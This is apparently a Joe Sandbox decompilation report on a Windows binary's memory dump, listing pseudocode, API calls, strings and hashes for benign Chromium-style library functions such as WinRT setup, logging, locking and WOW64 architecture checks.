0x000a16af
0x000a16b7
0x000a16b9
0x000a16bf
0x000a16bf
0x000a16b7
0x000a16d2

APIs

__Init_thread_header.LIBCMT ref: 000A16D8
GetProcAddress.KERNEL32(00000000,RoUninitialize), ref: 000A1715
__Init_thread_header.LIBCMT ref: 000A173B
LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,?,001269E0), ref: 000A178A

Strings

combase.dll, xrefs: 000A1785
RoUninitialize, xrefs: 000A170F
..\..\base\win\scoped_winrt_initializer.cc, xrefs: 000A175A
operator(), xrefs: 000A175F

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: Init_thread_header$AddressLibraryLoadProc
String ID: ..\..\base\win\scoped_winrt_initializer.cc$RoUninitialize$combase.dll$operator()
API String ID: 900114960-1867938867
Opcode ID: 9ad1c06f20244509de73d1d7f52301f676287f44c2c82937746e5c56ac22eb17
Instruction ID: e1929d457231af70f6cd02f1008c2c87637f7836b98cea6e2e522750f39209c9
Opcode Fuzzy Hash: 9ad1c06f20244509de73d1d7f52301f676287f44c2c82937746e5c56ac22eb17
Instruction Fuzzy Hash: 34313A70A05340EFD620EB64ED47BE933A1EB8A714F14013BF411976D2DF71A9E2CA52

Uniqueness

Uniqueness Score: -1.00%

Function 000781C8 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E000781C8(signed int __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				void* _v16;
				signed int _v24;
				char _v536;
				char _v560;
				char _v592;
				char _v608;
				char _v640;
				intOrPtr* _v644;
				intOrPtr* _v648;
				intOrPtr _v664;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int* _t40;
				void* _t41;
				void* _t42;
				void* _t45;
				signed int _t52;
				void* _t59;
				void* _t60;
				intOrPtr* _t63;
				intOrPtr _t66;
				intOrPtr* _t70;
				signed int _t75;
				void* _t87;
				char* _t89;
				intOrPtr* _t90;
				intOrPtr _t91;
				signed int _t92;
				signed int _t93;
				void* _t96;
				void* _t97;
				void* _t113;

				_t113 = __fp0;
				_t80 = __edx;
				_t37 =  *0x120014; // 0xf049169a
				_v24 = _t37 ^ _t92;
				_t90 =  &_v536;
				E000E11A0(_t87, _t90, 0xff, 0x200);
				_t96 = (_t93 & 0xfffffff0) - 0x280 + 0xc;
				_t88 = 0x200;
				_v644 = 0;
				while(1) {
					_v640 =  &_a20;
					_t40 = L00073E0B();
					_v648 = _t90;
					_t41 = E000E2288(_t80, _t88,  *_t40 | 0x00000002, _t40[1], _t90, _t88, _a16, 0,  &_a20);
					_t97 = _t96 + 0x1c;
					_t42 =  <  ? 0xffffffff : _t41;
					if(_t42 < 0) {
						break;
					}
					_t66 = _v644;
					if(_t88 <= 0x1ffff && _t42 >= _t88) {
						_t88 = _t88 << 2;
						_push(_t88);
						_t63 = L000DDC23();
						_t96 = _t97 + 4;
						_t90 = _t63;
						if(_t66 != 0) {
							L000DDC2C(_t66);
							_t96 = _t96 + 4;
						}
						_v644 = _t90;
						continue;
					}
					L8:
					_t70 =  *0x125d7c; // 0x0
					if(_t70 == 0) {
						asm("pcmpeqd xmm0, xmm0");
						_t89 =  &_v560;
						asm("movdqa [edi], xmm0");
						E000783C2(_t80, _t89, 0x1107ff, _a12);
						_t91 = _a8;
						_t45 = E000F31A0(_t91);
						_t47 =  <  ? 0 : _t45 - 0x16;
						_t48 = ( <  ? 0 : _t45 - 0x16) + _t91;
						asm("pcmpeqd xmm0, xmm0");
						asm("movdqu [edx+0xc], xmm0");
						asm("movdqa [edx], xmm0");
						_push(_t89);
						_push(( <  ? 0 : _t45 - 0x16) + _t91);
						E00078436( &_v592,  &_v592, "%*s:%s", 0x16 -  *((intOrPtr*)(_t89 + 0xc)));
						_t90 =  &_v640;
						E00078520(_t113, _t90);
						_t52 = L000FBF10( *_t90,  *((intOrPtr*)(_t90 + 4)), 0xf4240, 0);
						_t88 = _t52;
						_t75 = _t52 * 0x10624dd3 >> 0x20 >> 6;
						_t80 = (_t75 * 0x10624dd3 >> 0x20 >> 6) * 0x3e8;
						asm("pcmpeqd xmm0, xmm0");
						asm("movdqa [esi+0x10], xmm0");
						asm("movdqa [esi], xmm0");
						 *((intOrPtr*)(_t90 + 0x20)) = 0xffffffff;
						_push(_t75 * 0xfffffc18 + _t52);
						E000784AA((_t75 * 0x10624dd3 >> 0x20 >> 6) * 0x3e8, _t90, "[%03u.%03u] ", _t75 - 0x10624dd3);
						_t59 = L000E1EEF(2);
						_push(_v664);
						_push( &_v608);
						_t60 = L00076D00( &_v608, _t59, "%s%s %s\n", _t90);
					} else {
						 *0x137000();
						_t60 =  *_t70(_a4, _a12, _a8, _v648);
					}
					if(_t66 != 0) {
						_t60 = L000DDC2C(_t66);
					}
					return E000DE643(_t60, _t66, _v24 ^ _t92, _t80, _t88, _t90);
				}
				E000755D8(_t80, _v648, _t88, "%s", "[printf format error]");
				_t97 = _t97 + 0x10;
				_t66 = _v644;
				goto L8;
			}

0x000781c8
0x000781c8
0x000781d7
0x000781de
0x000781e5
0x000781f4
0x000781f9
0x000781fc
0x00078201
0x00078209
0x0007820c
0x00078210
0x00078221
0x0007822a
0x0007822f
0x00078239
0x0007823e
0x00000000
0x00000000
0x00078246
0x0007824a
0x00078250
0x00078253
0x00078254
0x00078259
0x0007825c
0x00078260
0x00078263
0x00078268
0x00078268
0x0007826b
0x00000000
0x0007826b
0x0007828c
0x0007828c
0x00078294
0x000782b3
0x000782b7
0x000782bb
0x000782c8
0x000782d0
0x000782d4
0x000782e8
0x000782eb
0x000782f1
0x000782f5
0x000782fa
0x000782fe
0x000782ff
0x00078307
0x0007830f
0x00078314
0x00078329
0x0007832e
0x00078339
0x00078350
0x00078358
0x0007835c
0x00078361
0x00078365
0x0007836c
0x00078374
0x0007837e
0x00078386
0x0007838e
0x00078396
0x00078296
0x00078296
0x000782a9
0x000782ab
0x000783a0
0x000783a3
0x000783a8
0x000783c0
0x000783c0
0x00078280
0x00078285
0x00078288
0x00000000

APIs

_strlen.LIBCMT ref: 000782D4
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00078329

Strings

%*s:%s, xrefs: 00078301
[%03u.%03u] , xrefs: 0007836E
[printf format error], xrefs: 00078271
%s%s %s, xrefs: 00078390

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
String ID: %*s:%s$%s%s %s$[%03u.%03u] $[printf format error]
API String ID: 2172594012-3351823563
Opcode ID: f71ca52cffab5c7e011d2795f75d2eca8e0a96dc8591300de790fbadf6d20bb5
Instruction ID: 8c855e4224bb83e750767599ef399503c25679a08f6c881ff424804b5046ff48
Opcode Fuzzy Hash: f71ca52cffab5c7e011d2795f75d2eca8e0a96dc8591300de790fbadf6d20bb5
Instruction Fuzzy Hash: 4F5188B2E007456FEB149F20CC06AABB759EFC4310F04C63CF95952183EF7495548B92

Uniqueness

Uniqueness Score: -1.00%

Function 000C0510 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32(0000001C), ref: 000C0538
ReleaseSRWLockExclusive.KERNEL32(?), ref: 000C05FF

Strings

%s:%d: assertion %s failed: %s, xrefs: 000C0643
node shouldn't be null, xrefs: 000C062F
..\..\buildtools\third_party\libc++\trunk\include\__tree, xrefs: 000C063E
__x != nullptr, xrefs: 000C0634

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\__tree$__x != nullptr$node shouldn't be null
API String ID: 17069307-1565806511
Opcode ID: 451ace230cbbd8115ce434232ec3157cbcb58096e8450fe44549419620c385cf
Instruction ID: d9e0ce8db93eca76b23c8dbfa5ecdb54ce78b674ffa0eaac9475ae633f543c32
Opcode Fuzzy Hash: 451ace230cbbd8115ce434232ec3157cbcb58096e8450fe44549419620c385cf
Instruction Fuzzy Hash: 9841AE31B04755CFCB25DF64C884FAEBBA1AF89700F18816EE5569B292DB719C81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 000AA760 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E000AA760(void* __fp0, intOrPtr* _a4) {
				void* _v16;
				signed int _v24;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t25;
				intOrPtr _t28;
				intOrPtr* _t34;
				signed int _t41;
				signed int _t43;
				signed int _t46;
				char* _t50;
				signed int _t53;
				intOrPtr* _t56;
				signed int _t58;
				signed int _t60;
				void* _t62;
				void* _t73;

				_t73 = __fp0;
				_t58 = _t60;
				_push(_t50);
				_push(_t56);
				_t62 = (_t60 & 0xfffffff0) - 0x40;
				asm("movsd xmm1, [ebp+0xc]");
				_t25 =  *0x120014; // 0xf049169a
				_v24 = _t25 ^ _t58;
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqa [esp+0x20], xmm0");
				asm("movdqa [esp+0x10], xmm0");
				_t2 =  &_v64; // 0x24
				_v76 = _t2;
				_v72 = 0x20;
				_v68 = 0;
				_t28 =  *0x13136c; // 0x0
				_t43 =  *0x123e38; // 0x0
				_t49 =  *[fs:0x2c];
				if(_t28 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t43 * 4)) + 4))) {
					L11:
					L000DDC67(_t28, 0x13136c);
					asm("movsd xmm1, [ebp+0xc]");
					_t62 = _t62 + 4;
					if( *0x13136c == 0xffffffff) {
						 *0x131348 = 1;
						 *0x13134c = 0;
						 *0x131350 = 0;
						 *0x131354 = 0x65;
						asm("movdqa xmm0, [0x115f20]");
						asm("movdqu [0x131358], xmm0");
						 *0x131368 = 0;
						L000DDCDD(0x13136c);
						asm("movsd xmm1, [ebp+0xc]");
						_t62 = _t62 + 4;
					}
				}
				_t62 = _t62 - 0x10;
				_t9 =  &_v76; // 0x1c
				_v88 = _t9;
				asm("movsd [esp], xmm1");
				_v84 = 0;
				L000BDAE2(0x131348, _t49, _t73);
				_t41 = _v84;
				if(_t41 >= 0x7ffffff0) {
					L000EE930(_t41, 0x131348, _t49, _t50, _t56);
					asm("int3");
					asm("int3");
					_push(_t58);
					return GetCurrentProcessId();
				}
				_t56 = _a4;
				if(_t41 > 0xa) {
					_t53 = (_t41 | 0x0000000f) + 1;
					_push(_t53);
					_t34 = L000DDBBC();
					_t62 = _t62 + 4;
					 *_t56 = _t34;
					 *(_t56 + 8) = _t53 | 0x80000000;
					 *(_t56 + 4) = _t41;
				} else {
					 *(_t56 + 0xb) = _t41;
					_t34 = _t56;
				}
				_t17 =  &_v64; // 0x18
				_t49 = _t17;
				_t50 = _t34 + _t41;
				_t46 = 0x131300 | _t50 - _t49 < 0x00000000;
				if(_t34 > _t49 || _t46 != 0) {
					if(_t41 != 0) {
						L000E0C20(_t34, _t49, _t41);
					}
					 *_t50 = 0;
					 *((char*)(_v76 + _t41)) = 0;
					E000DE643(_v76, _t41, _v24 ^ _t58, _t49, _t50, _t56);
					return _t56;
				} else {
					_push("char_traits::copy overlapped range");
					_push("__s2 < __s1 || __s2 >= __s1+__n");
					_push(0xec);
					_push("..\\..\\buildtools\\third_party\\libc++\\trunk\\include\\__string\\char_traits.h");
					_t28 = L00076D4C(_t41, _t46, _t49, _t73, "%s:%d: assertion %s failed: %s");
					goto L11;
				}
			}

0x000aa760
0x000aa761
0x000aa764
0x000aa765
0x000aa769
0x000aa76c
0x000aa771
0x000aa778
0x000aa77c
0x000aa780
0x000aa786
0x000aa78c
0x000aa790
0x000aa794
0x000aa79c
0x000aa7a4
0x000aa7a9
0x000aa7af
0x000aa7bf
0x000aa884
0x000aa889
0x000aa88e
0x000aa893
0x000aa89d
0x000aa8a3
0x000aa8ad
0x000aa8b7
0x000aa8c1
0x000aa8c8
0x000aa8d0
0x000aa8d8
0x000aa8e7
0x000aa8ec
0x000aa8f1
0x000aa8f1
0x000aa89d
0x000aa7c5
0x000aa7c8
0x000aa7cc
0x000aa7d0
0x000aa7d5
0x000aa7e2
0x000aa7e7
0x000aa7f1
0x000aa8f9
0x000aa8fe
0x000aa8ff
0x000aa900
0x000aa904
0x000aa904
0x000aa7f7
0x000aa7fd
0x000aa80b
0x000aa80c
0x000aa80d
0x000aa812
0x000aa815
0x000aa81d
0x000aa820
0x000aa7ff
0x000aa7ff
0x000aa802
0x000aa802
0x000aa823
0x000aa823
0x000aa827
0x000aa82c
0x000aa831
0x000aa839
0x000aa83e
0x000aa843
0x000aa846
0x000aa84d
0x000aa857
0x000aa865
0x000aa866
0x000aa866
0x000aa86b
0x000aa870
0x000aa875
0x000aa87f
0x00000000
0x000aa87f

APIs

__Init_thread_header.LIBCMT ref: 000AA889

Part of subcall function 000EE930: IsProcessorFeaturePresent.KERNEL32(00000017,000BBD91,?,000722C9,00000003,-FFE00000,?,?,?,000A6157,00000000), ref: 000EE94C

Strings

char_traits::copy overlapped range, xrefs: 000AA866
%s:%d: assertion %s failed: %s, xrefs: 000AA87A
..\..\buildtools\third_party\libc++\trunk\include\__string\char_traits.h, xrefs: 000AA875
__s2 < __s1 || __s2 >= __s1+__n, xrefs: 000AA86B
, xrefs: 000AA794

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: FeatureInit_thread_headerPresentProcessor
String ID: $%s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\__string\char_traits.h$__s2 < __s1 || __s2 >= __s1+__n$char_traits::copy overlapped range
API String ID: 3909347999-2750514336
Opcode ID: 4e01643388dd7a1290acc0b2b39b1a62d227b734d9293268d12f666420aea77e
Instruction ID: d5ebf71c3624171ce6159d527032950dead4c61f339f54bf2fd413b0c476785a
Opcode Fuzzy Hash: 4e01643388dd7a1290acc0b2b39b1a62d227b734d9293268d12f666420aea77e
Instruction Fuzzy Hash: CC410671A04380AFD310DF64D88175BB7E4FB86760F10C92EE4951BA82DBB59545CB92

Uniqueness

Uniqueness Score: -1.00%

Function 000A2770 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 94
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E000A2770(void* __ebx, void* __ecx, intOrPtr _a4) {
				signed int _v16;
				signed int _v20;
				signed short _v22;
				signed int _v24;
				void* __edi;
				void* __esi;
				signed int _t24;
				intOrPtr _t26;
				signed int _t32;
				void* _t36;
				signed int _t38;
				intOrPtr* _t40;
				intOrPtr _t51;
				void* _t52;
				signed int _t53;
				void* _t60;

				_t36 = __ebx;
				_t52 = __ecx;
				_t24 =  *0x120014; // 0xf049169a
				_v16 = _t24 ^ _t53;
				_t26 =  *0x126a34; // 0x0
				_t38 =  *0x123e38; // 0x0
				_t48 =  *[fs:0x2c];
				if(_t26 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t38 * 4)) + 4))) {
					L000DDC67(_t26, 0x126a34);
					if( *0x126a34 == 0xffffffff) {
						 *0x126a30 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "IsWow64Process2");
						L000DDCDD(0x126a34);
					}
				}
				_t51 = _a4;
				_t40 =  *0x126a30; // 0x0
				if(_t40 == 0) {
					_v20 = 0;
					_t28 =  &_v20;
					__imp__IsWow64Process(_t51, _t28);
					if(_t28 != 0) {
						if(_v20 == 0) {
							 *(_t52 + 0x48) = 0;
						} else {
							 *(_t52 + 0x48) = 1;
							 *(_t52 + 0x4c) = 1;
						}
					}
					L15:
					return E000DE643(_t28, _t36, _v16 ^ _t53, _t48, _t51, _t52);
				} else {
					_v22 = 0;
					_v24 = 0;
					 *0x137000();
					_t48 =  &_v22;
					_push( &_v24);
					_push( &_v22);
					_push(_t51);
					if( *_t40() == 0) {
						goto L15;
					}
					_t32 = _v22 & 0x0000ffff;
					_t11 = _t32 - 0x1c0; // -448
					_t60 = _t11 - 4;
					if(_t60 > 0) {
						L9:
						if(_t32 != 0) {
							if(_t32 != 0x14c) {
								_t32 = 3;
							} else {
								_t32 = 1;
							}
						}
						L14:
						 *(_t52 + 0x48) = _t32;
						_t28 = _v24 & 0x0000ffff;
						_t48 = 2 - (0 | (_v24 & 0x0000ffff) == 0x00008664);
						_t47 =  !=  ? 2 : 0;
						 *(_t52 + 0x4c) =  !=  ? 2 : 0;
						goto L15;
					}
					asm("bt edx, ecx");
					if(_t60 >= 0) {
						goto L9;
					} else {
						_t32 = 2;
						goto L14;
					}
				}
			}

0x000a2770
0x000a2778
0x000a277a
0x000a2781
0x000a2784
0x000a2789
0x000a278f
0x000a279f
0x000a2880
0x000a288f
0x000a28ac
0x000a28b6
0x000a28bb
0x000a288f
0x000a27a5
0x000a27a8
0x000a27b0
0x000a27f7
0x000a27fe
0x000a2803
0x000a280b
0x000a2811
0x000a2835
0x000a2813
0x000a2813
0x000a281a
0x000a281a
0x000a2811
0x000a2868
0x000a2878
0x000a27b2
0x000a27b2
0x000a27b8
0x000a27be
0x000a27c7
0x000a27ca
0x000a27cb
0x000a27cc
0x000a27d1
0x00000000
0x00000000
0x000a27d7
0x000a27db
0x000a27e1
0x000a27e4
0x000a2823
0x000a2825
0x000a282c
0x000a283e
0x000a282e
0x000a282e
0x000a282e
0x000a282c
0x000a2843
0x000a2843
0x000a2846
0x000a2859
0x000a2862
0x000a2865
0x00000000
0x000a2865
0x000a27eb
0x000a27ee
0x00000000
0x000a27f0
0x000a27f0
0x00000000
0x000a27f0
0x000a27ee

APIs

IsWow64Process.KERNEL32(?,00000000), ref: 000A2803
__Init_thread_header.LIBCMT ref: 000A2880
GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000A289A
GetProcAddress.KERNEL32(00000000,IsWow64Process2), ref: 000A28A6

Strings

IsWow64Process2, xrefs: 000A28A0
kernel32.dll, xrefs: 000A2895

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: AddressHandleInit_thread_headerModuleProcProcessWow64
String ID: IsWow64Process2$kernel32.dll
API String ID: 3408976151-2577318745
Opcode ID: c7242570f2542d001cabb36e698cf5ddbe824c93952d2c86c62a01fa6e5e8a25
Instruction ID: e278c7bb25ff9b5f3e66a27ddc46ecddba7df0939ef875141f966bbba83f6dd2
Opcode Fuzzy Hash: c7242570f2542d001cabb36e698cf5ddbe824c93952d2c86c62a01fa6e5e8a25
Instruction Fuzzy Hash: 7131C170E052069BEB24CB99D949BBE73B4EF45700F10403EE40297AD0EBB99985CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0007465E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E0007465E(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v16;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t29;
				signed int _t31;
				void* _t33;
				intOrPtr _t37;
				signed int _t39;
				intOrPtr _t47;
				signed int _t49;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t54;
				void* _t56;

				_t56 = (_t54 & 0xfffffff8) - 0x18;
				_t52 = __ecx;
				_t49 =  *0x120014; // 0xf049169a
				_t50 = _t49 ^ _t53;
				_v24 = _t49 ^ _t53;
				_v28 = _a8;
				_v32 = _a4;
				__imp__AcquireSRWLockExclusive(__ecx);
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(__ecx + 8)) + 1;
				_t29 =  *(__ecx + 0xc);
				if(_t29 == 0) {
					_t14 = _t52 + 4; // 0x34
					_v40 = _t14;
					_t31 =  *0x123e38; // 0x0
					_t18 =  *((intOrPtr*)( *[fs:0x2c] + _t31 * 4)) + 0x90; // 0x90
					_t51 = _t18;
					while(1) {
						_t33 = E00074758( &_v36, _t50);
						__imp__SleepConditionVariableSRW(_v40, _t52, _t33, 0);
						if(_t33 != 0) {
							goto L7;
						}
						_t34 = GetLastError();
						if(_t34 == 0x5b4) {
							_t39 = 0;
							L2:
							 *((intOrPtr*)(_t52 + 8)) =  *((intOrPtr*)(_t52 + 8)) - 1;
							__imp__ReleaseSRWLockExclusive();
							E000DE643(_t34, _t39, _v48 ^ _t53, _t50, _t51, _t52, _t52);
							return _t39;
						}
						_push(_t34);
						L00073BFF(3, "waiter.cc", 0x171, "SleepConditionVariableSRW failed: %lu");
						_t56 = _t56 + 0x14;
						L7:
						_t29 =  *(_t52 + 0xc);
						if(_t29 != 0) {
							goto L1;
						}
						_t37 =  *_t51;
						_t47 =  *((intOrPtr*)(_t37 + 0xb4));
						_t50 =  *(_t37 + 0xb8);
						if(( *(_t37 + 0xbc) & 0x00000001) == 0 && _t47 - _t50 >= 0x3d) {
							 *(_t37 + 0xbc) = 1;
						}
					}
				}
				L1:
				_t34 = _t29 - 1;
				 *(_t52 + 0xc) = _t29 - 1;
				_t39 = 1;
				goto L2;
			}

0x00074667
0x0007466a
0x00074672
0x00074678
0x0007467a
0x0007467e
0x00074682
0x00074687
0x0007468d
0x00074690
0x00074695
0x000746be
0x000746c1
0x000746c5
0x000746d4
0x000746d4
0x000746da
0x000746de
0x000746eb
0x000746f3
0x00000000
0x00000000
0x000746f5
0x00074700
0x00074750
0x0007469d
0x0007469d
0x000746a1
0x000746ad
0x000746bb
0x000746bb
0x00074702
0x00074714
0x00074719
0x0007471c
0x0007471c
0x00074721
0x00000000
0x00000000
0x00074727
0x0007472f
0x00074735
0x0007473e
0x00074747
0x00074747
0x0007473e
0x000746da
0x00074697
0x00074697
0x00074698
0x0007469b
0x00000000

APIs

AcquireSRWLockExclusive.KERNEL32(00000030,?,?,?,?,?,?,?,001041F3,?,00000000,00000000,00000000,00000000,?,00074BD4), ref: 00074687
ReleaseSRWLockExclusive.KERNEL32(00000030,?,?,?,?,?,?,?,001041F3,?,00000000,00000000,00000000,00000000,?,00074BD4), ref: 000746A1
SleepConditionVariableSRW.KERNEL32(?,00000030,00000000,00000000,?,?,?,?,?,?,?,001041F3,?,00000000,00000000,00000000), ref: 000746EB
GetLastError.KERNEL32(?,?,?,?,?,?,?,001041F3,?,00000000,00000000,00000000,00000000,?,00074BD4,0010FDAC), ref: 000746F5

Strings

SleepConditionVariableSRW failed: %lu, xrefs: 00074703
waiter.cc, xrefs: 0007470D

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionErrorLastReleaseSleepVariable
String ID: SleepConditionVariableSRW failed: %lu$waiter.cc
API String ID: 3356574640-1804019090
Opcode ID: 80b1bf6b169b729054291e101c8d765d14101331e8041ddb5dacce7ccb0b32f8
Instruction ID: 35bb56d42a2b15bfb8489ce9e544ac5209c995878d436dfbc6abfae741656578
Opcode Fuzzy Hash: 80b1bf6b169b729054291e101c8d765d14101331e8041ddb5dacce7ccb0b32f8
Instruction Fuzzy Hash: C4219C30A083049FD724DF29C885FAAB7E4EF49310F04C46DF85A87A92D774A945CB56

Uniqueness

Uniqueness Score: -1.00%

Function 000F6217 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000F6217(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0x1245e8 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0x108f30 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0x1245e8 + _v8 * 4;
